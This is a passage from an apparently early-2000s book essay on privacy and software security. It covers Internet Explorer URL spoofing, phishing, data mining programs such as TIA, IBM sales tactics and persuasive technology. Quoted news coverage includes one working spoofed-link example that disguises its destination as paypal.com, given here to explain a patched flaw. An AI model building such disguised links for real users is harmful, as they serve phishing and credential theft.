Once that happens, even if it’s sooner than Microsoft’s next slated security-bulletin release slated for Feb. 10, Microsoft will roll out the IE patch separately, Jones said.
A patch could come none too soon. Security experts say that they have seen a spike in phishing attacks after a December security bulletin revealed the IE spoofing exploit.
What does the world do when half a billion people depend upon one window through which to view the whole world, and the view through that window is distorted and manipulated by the smudges of all sorts of hidden agendas?
We could just live with it. We could all live with the fact that our perceptions are perpetually influenced by one enterprise and those of its partners who have paid its asking price to get their particular view of a part of the world pasted to the window.
Commercial enterprises do things this way. Don’t get me wrong—I’m an entrepreneur. I’m not one of those who from a comfortably funded perch rails against the evils of the profit motive. But being an entrepreneur, I know what enterprises do: they manipulate perceptions in order to build dependencies. (We’re all drug dealers, of a sort. Some of us try to ensure that what we sell not only takes away the pain but provides genuine benefit as well.) Today, the window through which the world gets its information and communication is provided by one commercial enterprise. This is such a bad idea.
Some things that make software vulnerable:
Complexity
Undocumented features serving unpublished agendas
Closed code
Certain link-on-the-fly approaches to software design
The software that provides the window through which the world gets its information and communication could be much simpler and still provide all the functionality that we expect. It could be made to adhere to standards such as those published by the W3C. Its code could be open to public scrutiny.
Furthermore, the window itself should be an integral part of the operating system. The irony of that fact will be appreciated when we recall that it was exactly the point on which the U.S. Justice Department made its antitrust case against Microsoft. Of all the charges that could have been brought against Microsoft for abuse of monopoly power, the government chose to accuse them of making progress in software design. Of course the operating system and the browser should be tightly integrated. Of course our information window should present things and act on our behalf with as little clutter and as few moving parts and “gotchas” as possible.
Microsoft was absolutely right to try to combine the browser and operating system. For that matter all the standard applications—word processor, spreadsheet, slide presentation software, database management system with contacts, email, calendar, personal finance including bank account links, simple general ledger and journals, document sharing and realtime collaboration, audio and video players including streaming media, publishing tools, basic programming tools—ought to be included also. That would give commercial software vendors a standard platform upon which to add value by providing templates and add-ons and specialized software for specialized industries.
With the new desktop platform and its PDA variants, there would never be a reason to introduce an incompatible file format. Anyone anywhere should be able to open a file sent by anyone anywhere. In contrast with current software that tends to provide no diagnostic information in error messages (thus maintaining your dependence on a channel partner’s certified technicians) it should tell you when asked exactly what it’s doing and what is preventing it from doing what it should be doing. Log files should be conveniently accessible by the user.
Its code should be available to and subject to the scrutiny of anyone who cares to scrutinize it. It should be regularly compiled from sources by independent local groups in cities and towns around the world, just to ensure that no one is sneaking in undocumented “features.” New features and standards should be the subject of worldwide debate.
Just as important as what should be in this common software package is what should not be in it. It should not have commercial agendas, hidden or otherwise. The software should not be something steering you this way and that. It should be like a roadway, accessible to any licensed driver responsibly driving a legal vehicle, without trying to influence where the driver goes and what he does.
Hmm, licensed driver. Here we are again, back to Identity Is the Foundation of Security. If we could identify the “driver” who is operating his vehicle in an irresponsible manner, then we would have an additional measure of protection. To use the example at hand, we should know who is attempting to subvert the URL-masking features of the browser.
But if we’re going to identify the drivers of the data vehicles on the information highway, we had better have a really sound means of protecting their privacy. There needs to be a real process in place, where the default condition is that information is not released to anyone.
Who Is Going to Do All This?
What commercial enterprise will dispense with the whole license-based software business model and simply distribute to the public, free of charge, software that today generates perhaps a hundred billion dollars of revenue every year for the software industry?Will the open source community provide the package? Certainly the open source people seem to be on this path. And yes, the product itself must be open source, so that we can all know what it is doing. The open source community is necessary, but it is not sufficient. In addition to that which is provided by the open source community, we will need two important components that it does not provide: authority and economics.
Authority is necessary because we are talking about a governed public platform. Only an entity with authority can govern. Often there is even less compatibility among open source software products than among commercial software products, where incompatibility has always been a weapon to be wielded against rivals. The authority that comes with duly elected governance processes can make and enforce the kinds of decisions that need to be made. Furthermore, if Identity Is The Foundation Of Security, then we will see as we study public key infrastructure that not only is a certification authority necessary, but the authority of a certification authority has to be real.
Economics is necessary because, well, open source people need to eat. Traditional open source efforts seem either to turn commercial or wither on the vine. When they turn commercial they turn manipulative, repeating the sins that they had just accused their commercial counterparts of. When they wither they provide ammunition for the commercial enterprises that lecture customers about the unreliability of open source software.
The source code for the software that provides that window should not only be published for all the world to see; it should be owned by an organization with a charter like those of the ITU or the UPU, which are accountable to member governments; or the ISO, which is accountable to nonprofit national standards-making organizations. (The ITU and UPU, being affiliated with the UN, are able to invoke governmental authority, which can be an important ingredient in resolving differences among competing standards from rival standards bodies.)
Later, when we introduce the Real Estate Professional Infrastructure, we will see that we can import the business model of the real estate professions—architecture, construction, and property management—to provide a reliable source of income to those who design, build, and maintain facilities based upon the new platform to clients. This answers a big concern of many independent open source professionals: where can they find a viable business model that puts food on their table even if they don’t have marketing and finance departments or a brand like Apache or Firefox?
Now we have a sketch of a platform that can handily solve the problems that the hidden-URL feature dropped in our lap.
Will it happen? Seems like a lot to expect, doesn’t it. On the other hand, how many more worm attacks, how many increasingly sophisticated phishing expeditions, how many emptied bank accounts will it take before large numbers of people start realizing that things must change? At some point, large numbers of users—including the courts, governments, information technology departments, simply a large subset of everybody—will get behind a new idea: the public, in the form of an ITU-like organization, should provide a secure, open-standards platform for all to use. Since things are not going to improve without this kind of change, I feel the change is inevitable.
For now, the software that presents the window through which half a billion people see the world is proprietary, built from secret code, embodying unpublished features and facilities disclosed only to developers who have signed nondisclosure agreements.
In response, Microsoft and others come up with patches and workarounds. Let’s take a look at the latest, explained on February 3, 2004 by John McCormick:
Facing loud criticisms about the vulnerabilities in Internet Explorer and Windows Explorer, Microsoft has released a major patch that affects the way browsers interpret URLs. This article will help you determine whether these changes might affect your development environment.
No more @ signs in URLs
IE’s default behavior for handling http and https URLs in the address line has led to serious vulnerabilities known as URL spoofing. This is when a malicious Web site could appear to have another URL, tricking users into downloading malware or sharing personal information such as passwords.
Microsoft’s fix involves the elimination of URLs containing the @ character, such as:
http(s)://username:password@server/resource.ext
After you apply the patch, if user information is included in an http or an https URL, a Web page with the title “Invalid syntax error” appears by default.
Workarounds
Microsoft provides Web and application developers with workarounds to this patch. For URLs that are opened by objects calling WinInet or Urlmon functions, use the InternetSetOption function and include the following option flags:
INTERNET_OPTION_USERNAME
INTERNET_OPTION_PASSWORD
And, instead of the InternetOpenURL function, use the IAuthenticate Interface.
For URLs opened by a script using credentials for state management, start using cookies. (MSDN offers details on how to use HTTP cookies with Visual Basic in an ASP.NET program.)
Once you install the update in IE, altering registry values will let you apply the new behavior to other programs or to disable the feature in IE. (Note: Editing the registry is risky, so be sure you have a verified backup before saving any changes.)
Developers who work with Web sites that include the @ symbol in legitimate URLs will need to make some changes when Microsoft users apply the IE patch. The Knowledge Base article 834489 contains preliminary information, and Microsoft says it plans to add to the article as more information becomes available. But, for now, the Knowledge Base article should give you an opportunity to begin altering existing applications or Web sites and to avoid using the soon-to-be-invalid URL strings in any current projects.
Although these changes aren’t a direct response to MyDoom and other worms that have made headlines lately, they do represent a major change in the way IE and Windows Explorer will work and in the level of security they provide. It’s unfortunate but understandable that combating such a major threat will require some developers to alter existing programs to conform to the new syntax restrictions.
This workaround is provided by software professionals and explained by a software professional. You may take comfort in the thought that “I am not a software professional; those guys know better than I what to do about the problem and so I will accept their solution.”
But let’s suspend that thought for a moment and look at just what we know about the problem and our untutored impression of the viability of the solution. Ask yourself: will this work? Does this have the look and feel of a long-lasting fix to the problem? Circle your answer.
| No, My malicious hamster could get around that fix. | Yes, I defer to the judgment of those who are so close to the problem that they can’t see its dimensions. |
You’ve just got to do something about that hamster. It seems he knocked this one off in one day:
A patch Microsoft Corp. released on Monday for a dangerous Internet Explorer vulnerability that lets attackers trick Internet users into visiting malicious sites doesn’t completely fix the problem…
The MS04-004 patch addresses [the malformed-url] bug, but not a related problem. If the user visits a Web page containing such a malformed link and hovers the mouse over the link or selects it by tabbing through links in the page, the patched version of Internet Explorer will display the partial URL in the status bar.
For example, take the link: “www.paypal.com%00%01@security.eweek.com.” On an unpatched copy of Internet Explorer, clicking the link will open a new window and bring the browser to security.eweek.com, the eWEEK.com Security Topic Center. On a patched copy of IE the browser will go to an error page indicating illegal syntax. Still, on either version of IE, if you hover over the link on this page, the status bar will display www.paypal.com.
Ironically, the cumulative patch also fixed another bug in a different IE cumulative update from last year. That cumulative patch addressed several security issues in Internet Explorer, but also introduced bugs in the behavior of the IE scrollbar. The new patch fixes these bugs.
And then the story closes with this wonderful bit of irony that could only come from this never-never land of preposterously Byzantine software that we all depend upon:
Editor’s Note: This story was updated to remove an example of a malformed link. The code caused some antivirus software and patched versions of IE to report illegal coding.
Back to the original January 15, 2004 story, for a closing note about the obvious:
While it is important for Microsoft to issue a fix, Maier [Dan Maier, the director of marketing for the Anti-Phishing Working Group] said, a security patch alone won’t solve the problem. A majority of consumers are unlikely to immediately update their versions of IE with the patch, leaving them open to spoofing.
Notice to users of popular desktop software: abandon hope, all ye who enter here. Just look at the chaos that is implicit in these reports. This stuff is falling apart!
But we’re being too hard on Microsoft in order to make a point. Phishing would probably be a thriving form of fraud even without the Explorer vulnerability. Like all the other forms of predatory behavior on today’s Internet, phishing is enabled more by anonymity than by any particular software vulnerability.
By now you probably can guess the QEI solution to the problem. If the original message is not signed by a properly authenticated individual, your mail program can be configured to automatically dump it into the trash. Even if you have not so configured your mail program, you can readily consider any messages that are unsigned or signed by some easily-spoofed identity to be suspect.
Until message-signing becomes commonplace, the phishing problem will be with us. A new approach called SmartMarks presents an image that is unique to each user on a site or in a mail message. When you see your own SmartMark on a site you can be quite sure that it’s authentic, as there would be no way for an impostor to know your SmartMark image without some fancy man-in-the-middle engineering.
Phony Security Harms You
Phony privacy makes it possible for nosy, avaricious—but legitimate—organizations to manipulate your perceptions and thereby manipulate your life. That’s pretty bad. But it’s nowhere near as bad as what’s in store for you and me as other groups with no legitimacy learn how to take full advantage of the age of ubiquitous high-speed Internet access to the home. That’s because the people who will take advantage of your new vulnerabilities are individuals and gangs with no legal form of organization. Unlike a corporation or other chartered organization that runs the risk of penalties and even dissolution if their activity is sufficiently antisocial to incur the displeasure of regulatory bodies, these are gangs and individual sociopaths with nothing whatsoever to lose.Here’s an article from Joe Connolly’s Networking Newsletter that illustrates why things are going to get worse:
Recent estimates project that the number of installed cable modems will grow to nearly one million by year end, and that the number of installed DSL circuits may also be close to a quarter of a million by year-end, more than double the size of last year’s installed base. The good news is that the high-speed on-ramp to the Internet that we’ve all been hoping for is well into the initial stages of construction. And for the first time in network history, telecommuters are experiencing a level of network performance that rivals what they get at the office.
One potential nightmare is the fact that these same high-speed pipes that bring the office into the living room can also serve as a conduit for a hacker community whose sole mission in life is to make yours miserable. For example, many cable modem services are implemented as one- or two-megabit shared channels that can support up to 32 simultaneous users. This means that it’s extremely easy for someone to pick up the Dynamic Host Configuration Protocol-assigned address for your workstation and launch their attacks over the same channel that you’re using to get your work done.
New network viruses, such as Sub-seven Trojan and Back Orifice, are particularly nasty because, unlike the recent Melissa and Chernobyl viruses, these variants can transfer remote control of a user’s PC over to a party who has anything but the best of intentions. And the even worse news is that some of these viruses can even escape initial detection by most of the popular anti-virus packages. This scenario does not change even for those users who are tunneled into a corporate network, because the corporate firewall is no defense against this type of localized attack.
This scenario creates the need for a whole new type of product—the personal firewall. The personal firewall is a product whose mission in life is to offer a level of protection that is comparable to what would be provided by a corporate firewall, but at a personal class of price. Enter Network ICE, a relatively new player formed by some seasoned Network General veterans. Network ICE recently announced a suite of products that combine secure agent-based protection at the end station together with a centralized monitor that can cooperate with individual agents to rapidly detect multi-station attacks.
Once installed, the end-station agent, called Black ICE, activates its network analysis logic to detect and block PCs and servers from a number of known hacking techniques (knowledge of over 200 techniques are supported initially). An extremely useful feature of Black ICE is that it will alert the user when any break-in attempts occur and will also identify intruders by domain name and Internet address. Thus, a more timely notification of attacks using Sub-seven Trojan and Back Orifice can be obtained.
Joe, electronic countermeasures just don’t work!
Recall the incident in July 1999, when Microsoft began letting users of its MSN and Hotmail send messages to people using AOL‘s proprietary instant messaging software. Within hours AOL had installed blocking software. Scant hours after that, Microsoft released a workaround that let its users get around AOL’s blockage. AOL responded with new blocks, and so on for about a dozen iterations.
Joe writes about business networking issues for a business audience. That’s why the headline and the message of the article talk about telecommuters. Such gaping holes may interfere with peoples’ ability to do their job from home. It is not Joe’s job to concern his readers with the fact that as more and more of their life is managed from files on their home computers; cable modems and DSL make people like you and me horribly vulnerable in ways we must consider right now.
We’ve talked about the hazard of children innocently disclosing information about their lives to strangers masquerading as their peers, or strangers whose intentions are unwholesome. But consider for a moment the inevitability of online registration for activities for young people. Let’s say it’s done intelligently. Such registration takes place over secure, encrypted forms. If the information about your child’s identity and location and schedule is intercepted on its way to the Brownie Scout server, it can’t be interpreted. Encryption makes it unreadable.
But wait, what about the information on your own computer at home? Shall you have a household rule that nobody keeps any personal information about themselves and their whereabouts in the computer? That’s thoroughly impossible. Just the information about when files were created and edited can tell someone a lot about who tends to be at home at what time.
You see, the term “server,” like so many technology nouns that we hope so fervently mean something distinct and clear, is actually a vague concept. If your home computer is online in such a way that someone may retrieve information from it, then it is a server. Practically every computer at some moment is a server. Every computer on a cable or DSL line is definitely a server unless specific steps are taken to prevent it from being a server. That means your computer at home is ready and willing to serve up its information to any of the half billion people on the Net, unless you have taken steps to prevent it.
How Baby Tables Are Made: The Dark Side of ETL
Extract, Transform, Load is a tremendously useful genre of software that has made great strides in the era of Service Oriented Architecture. The goal of ETL is to allow its user to quickly and easily grab data from anywhere in any format and put it into its proper place in a file, typically a very ambitious type of database called a data warehouse. Big companies show how much they value the idea of being able to offer ETL capabilities when for example IBM purchased ETL software maker Ascential in 2005 for $1.1 billion, more than four times Ascential’s revenue, which was growing at a clip of 50% a year.While ETL software is designed to serve entirely legitimate needs of legitimate enterprises, imagine how useful ETL software can be for a member of a cookie club. Cruise around the world of Web Services looking for tables of personal information, make a backroom deal for sharing the data. Remember, these are easy deals to make because unlike most exchanges where both parties actually give up something, table sharing is like any other kind of prostitution: you still have the asset after you sell it.
Vendors of ETL software include IBM/Ascential, Informatica, Microsoft, Pervasive Software, and Ab Initio. Of Ab Initio, Wikipedia says:
Ab Initio is known for being very secretive in the way that they run their business… Forcing prospective customers to jump through non-standard security hoops …As a privately held company it is not disclosing any revenue or employment numbers.
PervasiveSoftware pitches its Data Integrator aggressively:
Staying Ahead of the Competition
In today’s information-driven markets, businesses face the competitive challenge of finding new and better ways to aggregate, replicate, convert, and load data from across the enterprise into centralized stores for informed decision making.
Compounding this challenge, data must often be gathered from widely disparate sources, across multiple platforms and environments, and between both new and legacy systems—all on a real-time, event driven, or scheduled occurrence.
Without quality data gathered and processed on a regular basis, businesses lack the vital information they need to make the right decisions at the right time — and stay ahead of the competition.
What if “the competition” is a marketing manager’s rival for the next job up the ladder? ETL software can run on personal computers in the home or, to cover one’s tracks even better, in a PC in a neighboring town’s public library.
TIA-ing into the Stream of Fear Data
Back before tables from different organizational sources learned to mate, data mining was something that ostensibly took place among the tables of a single organization, a process to ferret out relationships and patterns that “help us to better serve our customers.” The mining of data using Orwellian joins, on tables of uncertain ownership or pedigree, tables floating around among cookie clubs, is not a public activity. It has not been acknowledged in any visible way by any recognizable companies or governments.September 11 has brought the tabular sex version of data mining out of the closet, using a vehicle called Terrorism Information Awareness. TIA (name changed in mid-2003 from Total Information Awareness in order to frighten the masses into accepting it) is a government project, sponsored by the same Defense Advanced Research Projects Agency that brought us the original Internet. Its goal is to provide to law enforcement agencies the ability to link all information about a suspected terrorist or anything or anyone related to the suspect. TIA brings together both reference-type information but also telephone records, travel itineraries (completed and not completed), information from bank statements, securities, transactions, credit and debit card transactions, trips through toll booths, and of course email gleaned from either Echelon or other sources.
The Electronic Frontier Foundation officially considers the plan for TIA to be worthy of the title How to Build a Police State. Mitchell Kapor, its founder, resigned from the board of Groove Networks over Groove’s willingness to support TIA in its software specifications. The EFF and other privacy and civil liberties organizations have made some impact, resulting in Congress modifying TIA’s charter on September 24, 2003, limiting it to foreign surveillance. However, it appears that the domestic portion of TIA has been moved to a service named Matrix, which stands for Multistate Anti-Terrorism Information Exchange. According to Boston.com,
Matrix houses restricted police and government files on colossal databases that sit in the offices of Seisint Inc., a Boca Raton, Fla., company founded by a millionaire who police say flew planeloads of drugs into the country in the early 1980s.
“It’s federally funded, it’s guarded by state police but it’s on private property? That’s very interesting,” said Christopher Slobogin, a University of Florida law professor and expert in privacy issues.
As a dozen more states pool their criminal and government files with Florida’s, Matrix databases are expanding in size and power. Organizers hope to coax more states to join, touting its usefulness in everyday policing.
Putting Matrix inside a private enterprise apparently allows the system to keep personal information that would violate the Privacy Act of 1974 if it were kept on government facilities.
At the other end of the spectrum, author Howard Bloom views TIA as a development that, like the original Arpanet, will be used by all of us. Calling it an “IQ expansion pack capable of plowing through the built-in barriers of central nervous system–based software,” Bloom says “It will show us whole new ways to look at what we’re up against—whether it’s bin Laden, a demanding boss, or that damn lost phone number.” He dismisses the privacy and perception-control threat with “Public scrutiny of ominous-sounding government plans is a good thing. If people are being abused by Big Brother, it’s vital to drag the atrocities out of hiding and stop them. The misuse of technology is a social evil, and it’s essential to fight against this sort of crime. But let’s remember that the evil resides in the crime, not the technology.”
Both Kapor and Bloom make valid points, but both are naïve. Bloom is naïve about the possibility of misuse of TIA and other sources of tables, naïve about whether a group in control of the resulting information and communication resources could be stopped after the fact. If TIA indeed became the central nervous system of an Orwellian police state, would Bloom then circulate a petition or initiate legislation to curtail its powers? The person or “assembler” (described later) in charge of TIA would easily thwart any such democratic subversion. Locking him out of society would take just a few keystrokes.
Kapor is naïve in thinking that civil liberties must always trump security, even in a world where terrorists are real and they know how to use our Constitution against us as a defensive weapon.
We can have both. We can have a viable public data mining facility that will provide immense benefit to every information-using person on Earth, including law enforcement people, and we can have privacy—far better privacy than we have today. The key is a new kind of control on the use of information. Later we will describe in more detail the means to that control, the Personal Intellectual Property Infrastructure.
Until we have MOI (the Personal Intellectual Property Infrastructure) however, TIA-ing into the stream of data that that is propelled by fear of terrorists will be a regular means of filling up those tables and getting them ready for their visit to the stud farm.
Footprints in the Snow
Later we’ll be taking a look at some new technology that is designed to enable you to protect—strongly protect—your privacy. Part of that technology could involve a device that reads information on a driver’s license. However, privacy advocates have sponsored legislation to make it illegal in two states. The encroachment on privacy never ends, and so it’s understandable that the those who watch out for encroachment would attack such an obvious PII machine. The protection impulse says, “Don’t just stand there, do something.” Prevent the obvious info grabbing, the kind that goes on in broad daylight. The driver’s license has a unique identifier on it, the social security number or other unique identifier. One can build a database with that basic piece of PII.This approach assumes that by preventing access to the unique government-issued identifier called social security number, or its equivalent, information about an individual cannot be collected in one central place. This is not only false, it is dangerous, and it leads to the false sense that protecting a certain kind of information materially thwarts privacy encroachment. It does not. In fact, every time you use your credit card you are registering information that is more meaningful than anything found on your driver’s license. With database technology, a single unique identifier is unnecessary to effectively aggregate information about an individual.
What does it take to figure out where a person is going from these “footprints in the snow”? You needn’t scientifically match every footprint with a piece of information that uniquely identifies that individual among all six billion people on Earth. If you have information of any sort about the identity of the person who made one of the footprints, and it is evident that the same person made all of the prints, then you can start drawing conclusions. If you have thousands of footprints that you can reasonably assume were made by the same individual, there is absolutely no need to link them using a number that some government has assigned to that person.
For example, suppose you had a seat high in an office tower with a panoramic view of people and activities below. In your hands is a laser tag gun with a very special property: it can “brand” the people below without their knowledge, leaving a mark which can later be read by a corresponding piece of special equipment, a receiver, from any distance, even if the subject is not in view.
The user of such equipment could automatically collect information on the location of any person tagged at any time, and compile a record of that person’s detailed activity over a lifetime. But he could never learn any identifying information ever assigned to any of his targets—in other words, he could never learn their names, their social security numbers, credit card numbers, bank account numbers, badge numbers, etc. But the lack of assigned identifying information would not inhibit the tracking activity in any way. Knowledge of social security number might not be worth the cost of the disk space to store those nine digits.
Physical tracking devices are becoming less rare, but they’re not needed anyway. In the world of information we leave our personal trails in a multitude of ways. Cookies are only one of the many sources of crumbs and tags with which we leave our trail. The social security number’s chief value to the cookie clubs is that it misdirects the privacy advocate’s attention to the visible and obvious, allowing the pickpocket to deftly, imperceptibly and continually grab the unobvious small information assets from the victim.
“How IE URL-handling patch affects Web builders,” by John McCormick, Builder.com, February 3, 2004.
“Bug Endures in Microsoft’s IE Patch,” by Larry Seltzer, eWeek, February 4, 2004.
“Do Telecommuters Need a Personal Firewall?” Networking Newsletter, July 7, 1999.
“I Want My TIA,“ by Howard Bloom, Wired, April 2003.
Magicians and performing pickpockets are fascinating to watch. Have you ever been part of the audience that watches a performing pickpocket remove a victim’s wallet, watch, belt, and jewelry—without the victim having a clue?
Guess what—it’s happening to you right now. With your present attire, you’re no match for a good pickpocket. You need to wear “clothing” that thwarts the pickpocket. Forget your social security number. It’s a distraction.
Now what if you were to grab that driver’s license from the encroacher and put it to use for yourself, in the same way a general seizes an enemy’s artillery and uses it against them? What if you were to assume control of the pieces of information about yourself? This is precisely what the Personal Intellectual Property Infrastructure delivers to you.
Mind Control
There is an interesting aspect to the privacy issue that never seems to get covered: What happens when the encroachers are successful? The result is more than a loss of privacy. It is a loss of control, the significance of which is difficult to overestimate. The loss of control takes place through the operation of a principle that you’ve seen illustrated in spy movies and police detective dramas. At some point in the plot the good guy uses the line, “to catch the [bad guys] we have to think like them. First, we have to know everything there is to know about them,” at which point the ace detective or master counterintelligence agent assigns information-gathering tasks to all present.“Account Control” and the “FUD“ Factor
The business corollary to the think-like-your-enemy principle is “To totally control this client you have to think like this client.” Hence the sales manager’s rallying cry to his or her troops working at the client site: gather detailed information about everybody who makes or influences decisions.I observed firsthand how this happens when I worked at a fairly large insurance company in the 1970s. I helped design software systems and wrote programs that ran on the company’s (physically) big IBM computer. I got to see up close how IBM exercised what they benignly call “account control.”
Account control means identifying every human being in the organization who makes or influences any decisions about the use of technology and learning everything there is to know about that person. IBM made it their business to know not just the usual who-reports-to-whom-and-what-are-his-kids’-names type of information. Any good sales rep does that
IBM, by contrast, would follow every footstep of the selected individuals. They would watch and know—how they felt about computers, how they dealt with people, what they were up to—that is, where did they want to go in the organization— whom they had lunch with, whom they hung out wit, and on and on.
After IBM studied their targeted individuals as a biologist studies a specimen, they would sort them into two overall groups: (1) those who were most likely to do as told and (2) those who were more likely to question things, mention competitors’ products and bring significant information to meetings other than what they got from IBM. Then they would introduce the FUD factor. Anyone who has ever dealt with IBM has heard that term. FUD stands for Fear, Uncertainty, Doubt.
IBM would keep the first group informed about new products, case studies, techniques, and so forth. The second group would be treated courteously but fed old or irrelevant information. When it came time to make big, costly decisions about computer upgrades, the boss would hear from this contingent of radicals talking about alternatives that were much better for a fraction of the cost. But they seemed to be so, well, uninformed.
How confusing. Wrought with fear, uncertainty, and doubt, the boss became the victim of view control and would invariably stick with the known entity, IBM. The result of IBM’s special brand of surveillance and perception control was that IBM practically ran the company. I saw the same phenomenon repeated many times a couple of years later when my new job had me working with people at other IBM customer companies.
Before the insurance company experience, I saw the FUD approach manifested in a clever and amusing way in the Air Force. IBM‘s big line printers used a punched paper tape to control page skips. A very simple-looking manual paper punch was used to punch precise rectangular holes in the loop of paper tape. If you had been selected by IBM and your superiors to be in on the IBM meetings, you learned that the operation of the paper punch was totally counterintuitive. The natural thing to do was to push the front of the punch, which wouldn’t have worked. The IBM-trained cognoscenti knew that, contrary to common sense, you had to push down on the back of the punch to make the front of the punch put a hole in the paper. One group of easily influenced individuals would be let in on the secret of the punch, while another, less pliable group was not.
During onsite training on a programming topic, the IBM representative would offhandedly ask one of those who “happened” to be uninformed to punch a hole in a particular spot on the tape while he continued with his talk. As he struggled in the background to perform the seemingly simple act of punching a hole in a piece of paper, the whole group inevitably started chuckling at the ineptitude of the victim. This would cause the IBM rep to turn around, “notice” the problem, and ask one of those who had been informed about the punch to help the victim. The message was simultaneously obvious and subtle: if you play ball with IBM you will know what’s going on around here. If you don’t, we will make a buffoon out of you.
Another FUD campaign was much more public. Some may recall that the familiar twenty-five-pin connector was synonymous with “serial”—the standard RS232 serial communications protocol for modems and other peripherals. Printing devices typically used a very different-looking (“Centronics”) parallel connector at both ends of a cable like the one still used at the printer end today.
All of a sudden the IBM Personal Computer arrived on the scene, with a very confusing printer connection. What was apparently a serial connector was really a parallel connector. Engineers recognize this sort of thing as a classic example of a choice that is certain to cause confusion, i.e., a very bad design choice. But it all depends on what you are trying to accomplish. If your goal is to discredit all the old geeks, what better way than to leave them fumbling around in front of the client, unable to connect a simple printer? The client politely turns to someone who has been properly “trained” by IBM in the way these new personal computers really work.
What has all this got to do with privacy? Very simply, if I know enough about you and I have access to your perceptions, I can control you. Few people want to believe that. And in the past, “knowing enough about you” meant knowing about you as a demographic statistic. “Having access to your perceptions” meant being able to buy commercials on TV shows that your demographic group likes to watch. “Controlling you” meant influencing the brand of peanut butter you bought or the candidate you voted for.
That is all changing. If you are not now targeted as an individual, you soon will be.
If you believe you are too smart, too wary, too in control to be manipulated by a robot, then you are the most vulnerable of all. I, the author who writes this, instinctively want to reject this notion. I want to believe that I can filter my own perceptions, that I can remain in control of my opinions and choices—certainly in the face of some mindless robot. But as I look analytically at the way some of these things work, I realize that I cannot rationally make that claim.
Captology
Captology. If that is a real word, surely it was coined by some conspiracy theorist.How about the Persuasive Technology Lab? Surely that cannot be what it sounds like, and surely it does not exist in any really credible environment. It must be another artifact of some overly imaginative paranoid with too much time on his hands, this year’s version of the Trilateral Commission or the Club of Rome, no?
No.
Allow me to introduce that most highly respected and admired pillar of academe, Stanford University, and its Persuasive Technology Laboratory. As the name implies, the Persuasive Technology Lab develops machines and programs that get you to do things you otherwise wouldn’t do. And the term they have coined for their field of study is… you guessed it, Captology. Check it out. From their website:
Welcome to the Stanford Persuasive Technology Lab. In our lab we research and design interactive technologies that motivate and influence users.
Like human persuaders, persuasive computing technologies can bring about positive changes in many domains, including health, safety, and education. With such ends in mind, we are creating a body of expertise in the design, theory, and analysis of persuasive technologies. We call this area “captology.”
Because captology expertise can enhance interactive technologies outside the world of academia, our research often involves collaborations with industrial partners, clients, and affiliates. We also focus on developing the best methods for designing and prototyping new persuasive technologies.
So there it is: a laboratory at Stanford University dedicated to the study of getting people to do what you want them to do through the use of computers. (It’s noteworthy that the Stanford.edu website, which is quite informative about the immense variety of work that goes on at the university, somehow neglects to list the Stanford Persuasive Technology Lab.)
One of the lab’s projects is called Optilex. The following is taken from the Captology newsletter:
The [controversial] idea behind Optilex is that language guides how we think and act. By knowing more words that are positively valenced, a person is more likely to perceive and act in positive ways. This raises a big question: Could Optilex really change how people think and behave? We don’t know; we haven’t yet measured the effects.
The following are also taken from the Captology newsletter:
SURVEILLANCE TECHNOLOGIES—PERSUASIVE OR COERCIVE?
Surveillance technologies are commonplace—everything from spying on nannies to monitoring Web use at work. While a few surveillance products can be considered persuasive technologies, we find the majority to be coercive, not persuasive.
Coercion in any form raises ethical questions, and this is especially true when technology is designed for this end. At times, however, a coercive technology may be for the public good, such as a system that monitors employee hand-washing behavior at restaurants.
Ethical or not, one thing seems clear: The use of surveillance tech—and the controversy about such use—will grow as technology advances . . . .
ENTERTAINMENT + PERSUASION = “INFLUTAINMENT”
in*flu*tain*ment, n. Entertainment that motivates or persuades
Although the concept is not new, “influtainment” is a new word to describe experiences that combine persuasion and entertainment. Technology examples include the CD-ROMs “Alcohol 101” and “5-A-Day Adventures.” We find that these and other products keep their audiences tuned in long enough to deliver persuasive messages or to motivate new behaviors. In the future, we expect to see more examples of influtainment on the web and in specialized high-tech devices.
The Dark Side of Captology
Throughout the discussions about Captology there are exercises labeled, “The Dark Side.” By studying the Dark Side exercises, the Captology student is supposed to learn about the ethics of Captology by becoming familiar with the ways in which it should not be used, lest it give the student inordinate power and wealth. [Wink, wink. Nudge, nudge.]In the MTV show Jackass, predominantly male twenty-somethings attempt everything short of killing themselves (rolling down a hill in a shopping cart, dropping heavy weights on themselves, etc.) in the name of “compelling television.” Of course the demographic is prepubescent teenage boys. And there are warnings: “Don’t try this at home. These people are trained idiots, not teenage boys with no sense of fatality”. Of course the warnings are ignored. Of course there have been lawsuits.
Or: “These instructions on how to make a bomb out of fertilizer and diesel oil are only for the purpose of alerting the reader so that he or she can recognize the pattern and discern when someone is doing something unsafe…”
Or: “This paper describes how to acquire a handgun without any paperwork in the hope that readers will recognize such illegal methods when they see them being followed… [Wink, wink.]”
There are plenty of precedents for this way of telling someone how to do something unethical by offering never-do-this instructions followed by details on what is never to be done.
The Dark Side of KITA
In the 1980s, an employee motivation technique called KITA generated a buzz around Harvard Business School. Generally associated with Frederick Herzberg, the technique calls for identifying emotional triggers in employees and “pushing their buttons,” i.e., invoking those emotional triggers at key moments in order to effect certain behaviors. According to Herzberg, KITA stands for “Kick In The Ass.”Herzberg identified two kinds of KITA: positive and negative. My acquaintances at the school told me that negative KITA was a “dark side” application of the technique and was dealt with in a dismissive manner as a matter for classroom study. After classes, in the local pub, however, the emphasis was quite different. Not only did negative KITA get the attention, but the focus was on how to use it to get one’s boss to discredit himself, resulting in his removal from the organization and opening up a rung on the ladder to the top.
Negative KITA is quite similar to a game that is familiar to anyone who grew up with siblings. The object of the game is to get the adversary to discredit himself or herself among parents, peers, and everyone else. For example, with parents nearby, the perpetrator “accidentally” bumps the adversary’s most precious model car, knocking it off its shelf right in front of him, in such a manner that the sibling can see it was quite intentional. Rival sibling screams, shoves, hits. Parents rush to check out the latest transgression and learn that an innocent accident has led to unwarranted retaliation. Parents discipline the apparent offender, who is of course more the victim than the perpetrator.
The goal of the technique is to get your rival to portray himself as a seething, sociopathic malcontent. In the home, the process goes through shouting and strife and perhaps visits to a counselor. In the workplace, it ends with a termination.
In the early ’90s, Harvard Business School announced a major effort to raise the importance of ethics among the subjects in their MBA curriculum. The reason for this initiative was the strong informal negative KITA culture that had developed outside the classroom. Or more accurately, Harvard MBAs were getting a reputation: if you hire one of them you’d better start looking for a new job. Producing products—Harvard MBAs—that have a reliability problem when deployed is detrimental to the brand.; so Harvard was simply fixing a problem with its brand.
